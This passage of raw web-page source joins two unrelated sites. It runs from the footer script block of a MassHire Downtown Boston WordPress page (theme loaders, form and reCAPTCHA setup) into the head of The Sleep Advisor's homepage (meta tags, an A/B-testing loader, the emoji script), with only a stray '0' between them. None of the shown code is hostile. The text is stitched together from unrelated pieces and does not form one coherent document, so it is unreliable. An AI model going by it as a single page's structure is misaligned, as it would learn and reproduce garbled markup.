row"}},"datepicker":{"dayNames":["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],"dayNamesShort":["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],"dayNamesMin":["S","M","T","W","T","F","S"],"monthNames":["January","February","March","April","May","June","July","August","September","October","November","December"],"monthNamesShort":["January","February","March","April","May","June","July","August","September","October","November","December"],"monthNamesMin":["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec"],"nextText":"Next","prevText":"Prev","currentText":"Today","closeText":"Done","today":"Today","clear":"Clear"},"registration_prompt":"There is unsaved attendee information. Are you sure you want to continue"};var tribe_system_info = {"sysinfo_optin_nonce":"1d8c583821","clipboard_btn_text":"Copy to clipboard","clipboard_copied_text":"System info copied","clipboard_fail_text":"Press \"Cmd + C\" to copy"};/* ]]> */ </script><link rel='stylesheet' id='akismet.css-css' href='https://masshiredowntownboston.org/wp-content/plugins/userway-accessibility-widget/assets/style.css?ver=5.2' type='text/css' media='all' /> <script type='text/javascript'> /* <![CDATA[ */ var wpcf7 = {"apiSettings":{"root":"https:\/\/masshiredowntownboston.org\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"}}; /* ]]> */ </script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.1.1'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-includes/js/jquery/ui/effect.min.js?ver=1.11.4'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-includes/js/jquery/ui/effect-slide.min.js?ver=1.11.4'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-includes/js/jquery/ui/effect-highlight.min.js?ver=1.11.4'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-includes/js/jquery/ui/effect-fold.min.js?ver=1.11.4'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-includes/js/jquery/ui/effect-blind.min.js?ver=1.11.4'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/plugins/show-hidecollapse-expand/assets/js/bg-show-hide.js?ver=5.2'></script> <script type='text/javascript' src='https://www.google.com/recaptcha/api.js?render=6Lfb64oUAAAAAL4LRiqOig5ItFZwOJlMIQdY6X_D&#038;ver=3.0'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/plugins/easy-twitter-feed-widget/js/twitter-widgets.js?ver=1.0'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/themes/Avada/includes/lib/assets/min/js/library/modernizr.js?ver=3.3.1'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/themes/Avada/includes/lib/assets/min/js/library/jquery.fitvids.js?ver=1.1'></script> <script type='text/javascript'> /* <![CDATA[ */ var fusionVideoGeneralVars = {"status_vimeo":"1","status_yt":"1"}; /* ]]> */ </script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/themes/Avada/includes/lib/assets/min/js/library/fusion-video-general.js?ver=1'></script> <script type='text/javascript'> /* <![CDATA[ */ var fusionLightboxVideoVars = {"lightbox_video_width":"1280","lightbox_video_height":"720"}; /* ]]> */ </script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/themes/Avada/includes/lib/assets/min/js/library/jquery.ilightbox.js?ver=2.2.3'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/themes/Avada/includes/lib/assets/min/js/library/jquery.mousewheel.js?ver=3.0.6'></script> <script type='text/javascript'> /* <![CDATA[ */ var fusionLightboxVars = {"status_lightbox":"1","lightbox_gallery":"1","lightbox_skin":"metro-white","lightbox_title":"1","lightbox_arrows":"1","lightbox_slideshow_speed":"5000","lightbox_autoplay":"","lightbox_opacity":"0.95","lightbox_desc":"1","lightbox_social":"1","lightbox_deeplinking":"1","lightbox_path":"vertical","lightbox_post_images":"1","lightbox_animation_speed":"Fast"}; /* ]]> */ </script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/themes/Avada/includes/lib/assets/min/js/general/fusion-lightbox.js?ver=1'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/themes/Avada/includes/lib/assets/min/js/library/imagesLoaded.js?ver=3.1.8'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/themes/Avada/includes/lib/assets/min/js/library/isotope.js?ver=3.0.4'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/themes/Avada/includes/lib/assets/min/js/library/packery.js?ver=2.0.0'></script> <script type='text/javascript'> /* <![CDATA[ */ var avadaPortfolioVars = {"lightbox_behavior":"all","infinite_finished_msg":"<em>All items displayed.<\/em>","infinite_blog_text":"<em>Loading the next set of posts...<\/em>","content_break_point":"900"}; /* ]]> */ </script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/plugins/fusion-core/js/min/avada-portfolio.js?ver=1'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/themes/Avada/includes/lib/assets/min/js/library/jquery.infinitescroll.js?ver=2.1'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/plugins/fusion-core/js/min/avada-faqs.js?ver=1'></script> <script type='text/javascript'> /* <![CDATA[ */ var fusionBgImageVars = {"content_break_point":"900"}; /* ]]> */ </script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/plugins/fusion-builder/assets/js/min/general/fusion-column-bg-image.js?ver=1'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/themes/Avada/includes/lib/assets/min/js/library/cssua.js?ver=2.1.28'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/themes/Avada/includes/lib/assets/min/js/library/jquery.waypoints.js?ver=2.0.3'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/themes/Avada/includes/lib/assets/min/js/general/fusion-waypoints.js?ver=1'></script> <script type='text/javascript'> /* <![CDATA[ */ var fusionAnimationsVars = {"disable_mobile_animate_css":"0"}; /* ]]> */ </script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/plugins/fusion-builder/assets/js/min/general/fusion-animations.js?ver=1'></script> <script type='text/javascript'> /* <![CDATA[ */ var fusionEqualHeightVars = {"content_break_point":"900"}; /* ]]> */ </script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/themes/Avada/includes/lib/assets/min/js/general/fusion-equal-heights.js?ver=1'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/plugins/fusion-builder/assets/js/min/general/fusion-column.js?ver=1'></script> <script type='text/javascript'> /* <![CDATA[ */ var fusionMapsVars = {"admin_ajax":"https:\/\/masshiredowntownboston.org\/wp-admin\/admin-ajax.php"}; /* ]]> */ </script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/themes/Avada/includes/lib/assets/min/js/library/jquery.fusion_maps.js?ver=2.2.2'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/themes/Avada/includes/lib/assets/min/js/general/fusion-google-map.js?ver=1'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/plugins/fusion-builder/assets/js/min/general/fusion-content-boxes.js?ver=1'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/themes/Avada/includes/lib/assets/min/js/library/jquery.cycle.js?ver=3.0.3'></script> <script type='text/javascript'> /* <![CDATA[ */ var fusionTestimonialVars = {"testimonials_speed":"4000"}; /* ]]> */ </script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/plugins/fusion-builder/assets/js/min/general/fusion-testimonials.js?ver=1'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/themes/Avada/includes/lib/assets/min/js/library/jquery.fade.js?ver=1'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/themes/Avada/includes/lib/assets/min/js/library/jquery.requestAnimationFrame.js?ver=1'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/themes/Avada/includes/lib/assets/min/js/library/fusion-parallax.js?ver=1'></script> <script type='text/javascript'> /* <![CDATA[ */ var fusionVideoBgVars = {"status_vimeo":"1","status_yt":"1"}; /* ]]> */ </script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/themes/Avada/includes/lib/assets/min/js/library/fusion-video-bg.js?ver=1'></script> <script type='text/javascript'> /* <![CDATA[ */ var fusionContainerVars = {"content_break_point":"900","container_hundred_percent_height_mobile":"0","is_sticky_header_transparent":"0"}; /* ]]> */ </script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/plugins/fusion-builder/assets/js/min/general/fusion-container.js?ver=1'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/plugins/fusion-builder/assets/js/min/general/fusion-syntax-highlighter.js?ver=1'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/plugins/fusion-builder/assets/js/min/library/jquery.countdown.js?ver=1.0'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/plugins/fusion-builder/assets/js/min/general/fusion-countdown.js?ver=1'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/plugins/fusion-builder/assets/js/min/library/jquery.countTo.js?ver=1'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/themes/Avada/includes/lib/assets/min/js/library/jquery.easyPieChart.js?ver=2.1.7'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/themes/Avada/includes/lib/assets/min/js/library/jquery.appear.js?ver=1'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/plugins/fusion-builder/assets/js/min/general/fusion-counters-circle.js?ver=1'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/themes/Avada/includes/lib/assets/min/js/library/bootstrap.transition.js?ver=3.3.6'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/themes/Avada/includes/lib/assets/min/js/library/bootstrap.tab.js?ver=3.1.1'></script> <script type='text/javascript'> /* <![CDATA[ */ var fusionTabVars = {"content_break_point":"900"}; /* ]]> */ </script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/plugins/fusion-builder/assets/js/min/general/fusion-tabs.js?ver=1'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/plugins/fusion-builder/assets/js/min/general/fusion-events.js?ver=1'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/plugins/fusion-builder/assets/js/min/general/fusion-progress.js?ver=1'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/themes/Avada/includes/lib/assets/min/js/library/bootstrap.modal.js?ver=3.1.1'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/plugins/fusion-builder/assets/js/min/general/fusion-modal.js?ver=1'></script> <script type='text/javascript'> /* <![CDATA[ */ var fusionCountersBox = {"counter_box_speed":"1000"}; /* ]]> */ </script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/plugins/fusion-builder/assets/js/min/general/fusion-counters-box.js?ver=1'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/plugins/fusion-builder/assets/js/min/general/fusion-title.js?ver=1'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/plugins/fusion-builder/assets/js/min/library/jquery.event.move.js?ver=2.0'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/plugins/fusion-builder/assets/js/min/general/fusion-image-before-after.js?ver=1.0'></script> <script type='text/javascript'> /* <![CDATA[ */ var fusionRecentPostsVars = {"infinite_loading_text":"<em>Loading the next set of posts...<\/em>","infinite_finished_msg":"<em>All items displayed.<\/em>","slideshow_autoplay":"1","slideshow_speed":"7000","pagination_video_slide":"","status_yt":"1"}; /* ]]> */ </script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/plugins/fusion-builder/assets/js/min/general/fusion-recent-posts.js?ver=1'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/themes/Avada/includes/lib/assets/min/js/library/bootstrap.collapse.js?ver=3.1.1'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/plugins/fusion-builder/assets/js/min/general/fusion-toggles.js?ver=1'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/plugins/fusion-builder/assets/js/min/general/fusion-gallery.js?ver=1'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/plugins/fusion-builder/assets/js/min/general/fusion-flip-boxes.js?ver=1'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/plugins/fusion-builder/assets/js/min/library/Chart.js?ver=2.7.1'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/plugins/fusion-builder/assets/js/min/general/fusion-chart.js?ver=1'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/themes/Avada/includes/lib/assets/min/js/library/vimeoPlayer.js?ver=2.2.1'></script> <script type='text/javascript'> /* <![CDATA[ */ var fusionVideoVars = {"status_vimeo":"1"}; /* ]]> */ </script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/plugins/fusion-builder/assets/js/min/general/fusion-video.js?ver=1'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/themes/Avada/includes/lib/assets/min/js/library/jquery.hoverintent.js?ver=1'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/themes/Avada/assets/min/js/general/avada-vertical-menu-widget.js?ver=1'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/themes/Avada/includes/lib/assets/min/js/library/lazysizes.js?ver=4.1.5'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/themes/Avada/includes/lib/assets/min/js/library/bootstrap.tooltip.js?ver=3.3.5'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/themes/Avada/includes/lib/assets/min/js/library/bootstrap.popover.js?ver=3.3.5'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/themes/Avada/includes/lib/assets/min/js/library/jquery.carouFredSel.js?ver=6.2.1'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/themes/Avada/includes/lib/assets/min/js/library/jquery.easing.js?ver=1.3'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/themes/Avada/includes/lib/assets/min/js/library/jquery.flexslider.js?ver=2.2.2'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/themes/Avada/includes/lib/assets/min/js/library/jquery.hoverflow.js?ver=1'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/plugins/the-events-calendar/vendor/jquery-placeholder/jquery.placeholder.min.js?ver=4.9.1.1'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/themes/Avada/includes/lib/assets/min/js/library/jquery.touchSwipe.js?ver=1.6.6'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/themes/Avada/includes/lib/assets/min/js/general/fusion-alert.js?ver=1'></script> <script type='text/javascript'> /* <![CDATA[ */ var fusionCarouselVars = {"related_posts_speed":"2500","carousel_speed":"2500"}; /* ]]> */ </script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/themes/Avada/includes/lib/assets/min/js/general/fusion-carousel.js?ver=1'></script> <script type='text/javascript'> /* <![CDATA[ */ var fusionFlexSliderVars = {"status_vimeo":"1","page_smoothHeight":"false","slideshow_autoplay":"1","slideshow_speed":"7000","pagination_video_slide":"","status_yt":"1","flex_smoothHeight":"false"}; /* ]]> */ </script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/themes/Avada/includes/lib/assets/min/js/general/fusion-flexslider.js?ver=1'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/themes/Avada/includes/lib/assets/min/js/general/fusion-popover.js?ver=1'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/themes/Avada/includes/lib/assets/min/js/general/fusion-tooltip.js?ver=1'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/themes/Avada/includes/lib/assets/min/js/general/fusion-sharing-box.js?ver=1'></script> <script type='text/javascript'> /* <![CDATA[ */ var fusionBlogVars = {"infinite_blog_text":"<em>Loading the next set of posts...<\/em>","infinite_finished_msg":"<em>All items displayed.<\/em>","slideshow_autoplay":"1","slideshow_speed":"7000","pagination_video_slide":"","status_yt":"1","lightbox_behavior":"all","blog_pagination_type":"load_more_button","flex_smoothHeight":"false"}; /* ]]> */ </script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/themes/Avada/includes/lib/assets/min/js/general/fusion-blog.js?ver=1'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/themes/Avada/includes/lib/assets/min/js/general/fusion-button.js?ver=1'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/themes/Avada/includes/lib/assets/min/js/general/fusion-general-global.js?ver=1'></script> <script type='text/javascript'> /* <![CDATA[ */ var avadaHeaderVars = {"header_position":"top","header_layout":"v3","header_sticky":"1","header_sticky_type2_layout":"menu_only","side_header_break_point":"1000","header_sticky_mobile":"0","header_sticky_tablet":"0","mobile_menu_design":"modern","sticky_header_shrinkage":"1","nav_height":"120","nav_highlight_border":"5","nav_highlight_style":"bar","logo_margin_top":"10px","logo_margin_bottom":"10px","layout_mode":"wide","header_padding_top":"0px","header_padding_bottom":"0px","offset_scroll":"full"}; /* ]]> */ </script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/themes/Avada/assets/min/js/general/avada-header.js?ver=5.8.1'></script> <script type='text/javascript'> /* <![CDATA[ */ var avadaMenuVars = {"header_position":"Top","logo_alignment":"Left","header_sticky":"1","side_header_break_point":"1000","mobile_menu_design":"modern","dropdown_goto":"Go to...","mobile_nav_cart":"Shopping Cart","mobile_submenu_open":"Open Sub Menu","mobile_submenu_close":"Close Sub Menu","submenu_slideout":"1"}; /* ]]> */ </script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/themes/Avada/assets/min/js/general/avada-menu.js?ver=5.8.1'></script> <script type='text/javascript'> /* <![CDATA[ */ var fusionScrollToAnchorVars = {"content_break_point":"900","container_hundred_percent_height_mobile":"0"}; /* ]]> */ </script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/themes/Avada/includes/lib/assets/min/js/general/fusion-scroll-to-anchor.js?ver=1'></script> <script type='text/javascript'> /* <![CDATA[ */ var fusionTypographyVars = {"site_width":"1170px","typography_responsive":"1","typography_sensitivity":"0.60","typography_factor":"1.50","elements":"h1, h2, h3, h4, h5, h6"}; /* ]]> */ </script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/themes/Avada/includes/lib/assets/min/js/general/fusion-responsive-typography.js?ver=1'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/themes/Avada/assets/min/js/library/bootstrap.scrollspy.js?ver=3.3.2'></script> <script type='text/javascript'> /* <![CDATA[ */ var avadaCommentVars = {"title_style_type":"none","title_margin_top":"0px","title_margin_bottom":"15px"}; /* ]]> */ </script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/themes/Avada/assets/min/js/general/avada-comments.js?ver=5.8.1'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/themes/Avada/assets/min/js/general/avada-general-footer.js?ver=5.8.1'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/themes/Avada/assets/min/js/general/avada-quantity.js?ver=5.8.1'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/themes/Avada/assets/min/js/general/avada-scrollspy.js?ver=5.8.1'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/themes/Avada/assets/min/js/general/avada-select.js?ver=5.8.1'></script> <script type='text/javascript'> /* <![CDATA[ */ var avadaSidebarsVars = {"header_position":"top","header_layout":"v3","header_sticky":"1","header_sticky_type2_layout":"menu_only","side_header_break_point":"1000","header_sticky_tablet":"0","sticky_header_shrinkage":"1","nav_height":"120","content_break_point":"900"}; /* ]]> */ </script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/themes/Avada/assets/min/js/general/avada-sidebars.js?ver=5.8.1'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/themes/Avada/assets/min/js/library/jquery.sticky-kit.js?ver=5.8.1'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/themes/Avada/assets/min/js/general/avada-tabs-widget.js?ver=5.8.1'></script> <script type='text/javascript'> /* <![CDATA[ */ var toTopscreenReaderText = {"label":"Go to Top"}; /* ]]> */ </script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/themes/Avada/assets/min/js/library/jquery.toTop.js?ver=1.2'></script> <script type='text/javascript'> /* <![CDATA[ */ var avadaToTopVars = {"status_totop_mobile":"1"}; /* ]]> */ </script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/themes/Avada/assets/min/js/general/avada-to-top.js?ver=5.8.1'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/themes/Avada/assets/min/js/general/avada-drop-down.js?ver=5.8.1'></script> <script type='text/javascript'> /* <![CDATA[ */ var avadaFadeVars = {"page_title_fading":"1","header_position":"Top"}; /* ]]> */ </script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/themes/Avada/assets/min/js/general/avada-fade.js?ver=5.8.1'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/themes/Avada/assets/min/js/general/avada-contact-form-7.js?ver=5.8.1'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/themes/Avada/assets/min/js/general/avada-events.js?ver=5.8.1'></script> <script type='text/javascript'> /* <![CDATA[ */ var avadaFusionSliderVars = {"side_header_break_point":"1000","slider_position":"below","header_transparency":"0","mobile_header_transparency":"0","header_position":"Top","content_break_point":"900","status_vimeo":"1"}; /* ]]> */ </script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/plugins/fusion-core/js/min/avada-fusion-slider.js?ver=1'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-includes/js/wp-embed.min.js?ver=5.2'></script> <script type="text/javascript"> ( function( grecaptcha, sitekey ) { var wpcf7recaptcha = { execute: function() { grecaptcha.execute( sitekey, { action: 'homepage' } ).then( function( token ) { var forms = document.getElementsByTagName( 'form' ); for ( var i = 0; i < forms.length; i++ ) { var fields = forms[ i ].getElementsByTagName( 'input' ); for ( var j = 0; j < fields.length; j++ ) { var field = fields[ j ]; if ( 'g-recaptcha-response' === field.getAttribute( 'name' ) ) { field.setAttribute( 'value', token ); break; } } } } ); } }; grecaptcha.ready( wpcf7recaptcha.execute ); document.addEventListener( 'wpcf7submit', wpcf7recaptcha.execute, false ); } )( grecaptcha, '6Lfb64oUAAAAAL4LRiqOig5ItFZwOJlMIQdY6X_D' ); </script> </body> </html>
0
<!DOCTYPE html> <!--[if IE 8]> <html class="ie8" lang="en-US" prefix="og: http://ogp.me/ns#"> <![endif]--> <!--[if IE 9]> <html class="ie9" lang="en-US" prefix="og: http://ogp.me/ns#"> <![endif]--> <!--[if (gt IE 9)|!(IE)] lang="en-US" prefix="og: http://ogp.me/ns#"><![endif]--> <html lang="en-US" prefix="og: http://ogp.me/ns#"> <head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width" /> <link rel="profile" href="https://gmpg.org/xfn/11" /> <link rel="pingback" href="https://www.sleepadvisor.org/xmlrpc.php" /> <!--[if lt IE 9]><script src="https://www.sleepadvisor.org/wp-content/themes/rehub/js/html5shiv.js"></script><![endif]--> <script>var et_site_url='https://www.sleepadvisor.org';var et_post_id='13569';function et_core_page_resource_fallback(a,b){"undefined"===typeof b&&(b=a.sheet.cssRules&&0===a.sheet.cssRules.length);b&&(a.onerror=null,a.onload=null,a.href?a.href=et_site_url+"/?et_core_page_resource="+a.id+et_post_id:a.src&&(a.src=et_site_url+"/?et_core_page_resource="+a.id+et_post_id))} </script><title>The Sleep Advisor | Healthy Sleep Tips, News and Product Reviews</title><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Open%20Sans%3A400%2C700%7CRoboto%3A300%2C400%2C700&subset=" /><link rel="stylesheet" href="https://www.sleepadvisor.org/wp-content/cache/min/1/49240caa726035423095d82a3d06f752.css" data-minify="1" /> <script type='text/javascript'> var _vwo_code=(function(){ var account_id=322771, settings_tolerance=5000, library_tolerance=5000, use_existing_jquery=false, f=false,d=document;return{use_existing_jquery:function(){return use_existing_jquery;},library_tolerance:function(){return library_tolerance;},finish:function(){if(!f){f=true;var a=d.getElementById('_vis_opt_path_hides');if(a)a.parentNode.removeChild(a);}},finished:function(){return f;},load:function(a){var b=d.createElement('script');b.src=a;b.type='text/javascript';b.innerText;b.onerror=function(){_vwo_code.finish();};d.getElementsByTagName('head')[0].appendChild(b);},init:function(){settings_timer=setTimeout('_vwo_code.finish()',settings_tolerance);this.load('//dev.visualwebsiteoptimizer.com/j.php?a='+account_id+'&u='+encodeURIComponent(d.URL)+'&r='+Math.random());var a=d.createElement('style'),b='body{opacity:0 !important;filter:alpha(opacity=0) !important;background:none !important;}',h=d.getElementsByTagName('head')[0];a.setAttribute('id','_vis_opt_path_hides');a.setAttribute('type','text/css');if(a.styleSheet)a.styleSheet.cssText=b;else a.appendChild(d.createTextNode(b));h.appendChild(a);return settings_timer;}};}());_vwo_settings_timer=_vwo_code.init(); </script> <meta name="description" content="The Sleep Advisor Magazine brings you the latest tips, research, news and reviews for a better and healthy sleep for you and your loved ones." /> <link rel="canonical" href="https://www.sleepadvisor.org/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="website" /> <meta property="og:title" content="The Sleep Advisor | Healthy Sleep Tips, News and Product Reviews" /> <meta property="og:description" content="The Sleep Advisor Magazine brings you the latest tips, research, news and reviews for a better and healthy sleep for you and your loved ones." /> <meta property="og:url" content="https://www.sleepadvisor.org/" /> <meta property="og:site_name" content="The Sleep Advisor" /> <meta name="twitter:card" content="summary" /> <meta name="twitter:description" content="The Sleep Advisor Magazine brings you the latest tips, research, news and reviews for a better and healthy sleep for you and your loved ones." /> <meta name="twitter:title" content="The Sleep Advisor | Healthy Sleep Tips, News and Product Reviews" /> <meta name="twitter:site" content="@sleepadvisormag" /> <meta name="twitter:image" content="https://www.sleepadvisor.org/wp-content/uploads/2018/02/featured-on-brands.png" /> <meta name="twitter:creator" content="@sleepadvisormag" /> <script type='application/ld+json'>{"@context":"https:\/\/schema.org","@type":"WebSite","@id":"#website","url":"https:\/\/www.sleepadvisor.org\/","name":"The Sleep Advisor","potentialAction":{"@type":"SearchAction","target":"https:\/\/www.sleepadvisor.org\/?s={search_term_string}","query-input":"required name=search_term_string"}}</script> <script type='application/ld+json'>{"@context":"https:\/\/schema.org","@type":"Organization","url":"https:\/\/www.sleepadvisor.org\/","sameAs":["https:\/\/www.facebook.com\/sleepadvisor\/","https:\/\/www.youtube.com\/c\/SleepAdvisor","https:\/\/www.pinterest.com\/thesleepadvisor\/","https:\/\/twitter.com\/sleepadvisormag"],"@id":"https:\/\/www.sleepadvisor.org\/#organization","name":"The Sleep Advisor","logo":"https:\/\/www.sleepadvisor.org\/wp-content\/uploads\/2017\/02\/the-sleep-advisor-logo.png"}</script> <link rel='dns-prefetch' href='//www.google.com' /> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="The Sleep Advisor &raquo; Feed" href="https://www.sleepadvisor.org/feed/" /> <link rel="alternate" type="application/rss+xml" title="The Sleep Advisor &raquo; Comments Feed" href="https://www.sleepadvisor.org/comments/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.sleepadvisor.org\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.1"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 